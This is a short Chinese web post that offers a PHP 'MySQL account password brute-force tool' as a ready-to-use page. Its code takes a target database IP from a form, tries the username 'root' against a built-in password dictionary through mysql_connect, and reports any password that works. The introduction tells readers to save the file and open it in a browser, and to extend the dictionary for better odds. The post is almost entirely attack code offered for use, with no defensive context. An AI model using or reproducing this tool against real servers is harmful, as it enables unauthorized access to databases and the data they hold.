时间:2021-01-22 12:25:47 | 栏目:Mysql | 点击:次
Mysql PHP版本爆破小脚本
(注意:从代码可以看出用户名是个变量,一般数据库账号不会变,所以用户名没用数组作为字典。密码是用数组作为字典。字典可根据规矩扩展,破解的成功与失败,就看你扩展的字典强大不强大了。用法:保存代码为MysqlDatabaseBlasting.php,浏览器打开就可使用。 )
/* * author:Bearcat 2016-10-5 */ <html> <head> <title>Mysql账号密码爆破工具</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body> <center> <br><br> <h1>MysqlDatabaseBlasting(Mysql账号密码在线爆破工具 V1.0)</h1> <br> <?php if(@$_POST['submit']){ $host = @$_POST['host']; if($host!=""){ $username = "root";//用户名字典 $password = array('','123456','admin','root','ccf304vn'); //密码字典 echo "<hr><br>--------------------爆破状态--------------------<br>"; echo "密码错误次数:"; for ($i=0; $i <= count($password); $i++) { if(@mysql_connect($host, $username, $password[$i])){ echo "<br><br><font color='red'>爆破成功--密码-->".@$password[$i]."</font>"; break; }else{ echo $i."、"; continue; } } echo "<br>--------------------爆破结束--------------------<br><hr>"; }else{ echo "<script>alert('黑客,输入数据库IP地址')</script>"; } } ?> <br><br><br><br> <form action="MysqlDatabaseBlasting.php" method="post"> 数据库IP地址:<input type="text" name="host"/> <input type="submit" value="爆破" name="submit"/> </form> <center> </body> </html>